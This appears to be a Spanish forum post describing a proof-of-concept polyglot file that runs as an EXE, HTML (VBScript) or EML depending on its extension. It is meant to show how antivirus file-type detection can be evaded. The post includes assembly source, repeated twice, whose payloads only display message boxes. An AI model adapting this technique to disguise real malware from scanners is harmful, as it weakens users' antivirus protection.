Autor
http://foro.elhacker.net/index.php/topic,92559.0.html
actualizo la informacion:
cuando un antivirus, abre un archivo para examinarlo, debe primero determinar de que tipo de archivo se trata, un exe, un archivo de audio, etc.
Esto es importante, pues aumenta la velocidad de la exploracion y reduce la posibilidad de positivos falsos.
Para lograr la detección del filetype algunos antivirus miraban simplemente la extensión del archivo (un archivo nombrado hola.exe fue asumido como ejecutable), no obstante esto fue considerado escaso Todos los antivirus modernos ahora miran el contenido del archivo para determinar el filetype. Por ejemplo, los ficheros ejecutables (EXE) comienzan con "MZ" (0x4DÄ).
Ahora como podriamos explotar esta vulnerabilidad:
Prueba de Concepto
-----------------------
He aqui un programa que tiene tres diversos puntos de entrada de ejecucion dependiendo de la extension del archivo (exe, HTML o eml)
El CODIGO (asm)
Código:
; EXE-HTM Hybrid
; by Wayne Langlois (www.diamondcs.com.au)
include 'e:\dev\asm\fasm162\include\win32ax.inc'
_HTML db 'Reply-To: <wayne@local>',0Dh,0Ah,'From: <wayne@local>',0Dh,0Ah,'To: <wayne@local>',0Dh,0Ah,'Subject: My subject',0Dh,0Ah,\
'Content-Type: multipart/alternative; boundary="--Boundary"',0Dh,0Ah,\
0Dh,0Ah,\
'----Boundary',0Dh,0Ah,\
0Dh,0Ah,\
'<html><body>',0Dh,0Ah,\
'<script language="vbscript">Msgbox "Hello from the HTML component!"</script>',0Dh,0Ah,\
'</body></html>',0Dh,0Ah,\
'----Boundary',0Dh,0Ah,\
'Content-Type: text/html',0Dh,0Ah,\
0Dh,0Ah,\
'This is the text that will be seen when viewed as a .EML',0Dh,0Ah,\
0Dh,0Ah,0Dh,0Ah,\
'----Boundary--',0Dh,0Ah,0
.code
start:
invoke MessageBox,HWND_DESKTOP,"Hello from the EXE component!","EXE",MB_OK
invoke ExitProcess,0
.end start
; by Wayne Langlois (www.diamondcs.com.au)
include 'e:\dev\asm\fasm162\include\win32ax.inc'
_HTML db 'Reply-To: <wayne@local>',0Dh,0Ah,'From: <wayne@local>',0Dh,0Ah,'To: <wayne@local>',0Dh,0Ah,'Subject: My subject',0Dh,0Ah,\
'Content-Type: multipart/alternative; boundary="--Boundary"',0Dh,0Ah,\
0Dh,0Ah,\
'----Boundary',0Dh,0Ah,\
0Dh,0Ah,\
'<html><body>',0Dh,0Ah,\
'<script language="vbscript">Msgbox "Hello from the HTML component!"</script>',0Dh,0Ah,\
'</body></html>',0Dh,0Ah,\
'----Boundary',0Dh,0Ah,\
'Content-Type: text/html',0Dh,0Ah,\
0Dh,0Ah,\
'This is the text that will be seen when viewed as a .EML',0Dh,0Ah,\
0Dh,0Ah,0Dh,0Ah,\
'----Boundary--',0Dh,0Ah,0
.code
start:
invoke MessageBox,HWND_DESKTOP,"Hello from the EXE component!","EXE",MB_OK
invoke ExitProcess,0
.end start
aqui la version compilada:
http://www.securityelf.org/files/exe_html_eml.zip
Descomprimimos y ejecutamos, y cambiamos sucesivamente a exe, HTML o eml (cuando se trate de HTML usar IE)
Este programa es un hibrido de tres vias:algo de HTML que esta dentro de un EML y a su vez dentro de un EXE
Si lo Usas con extension .EXE recibiras un mensaje tal como:¨"Hello from the EXE component!"
Con la Extension .EML un mensaje como ¨"This is the text that will be seen when viewed as a .EML"¨
Y por ultimo, con extension .HTML un mensaje: "Hello from the HTML component!"
En el caso del HTML, podra observar ¨que se muestra parte del codigo en pantalla, pero lo importante es que el VBscript se a ejecutado como puedes mirarlo en:
http://ciberia.ya.com/webmousehack/antiV.html
(solo con internet explorer cualquier version)
Fuente:
securityfocus
Salu2
En línea
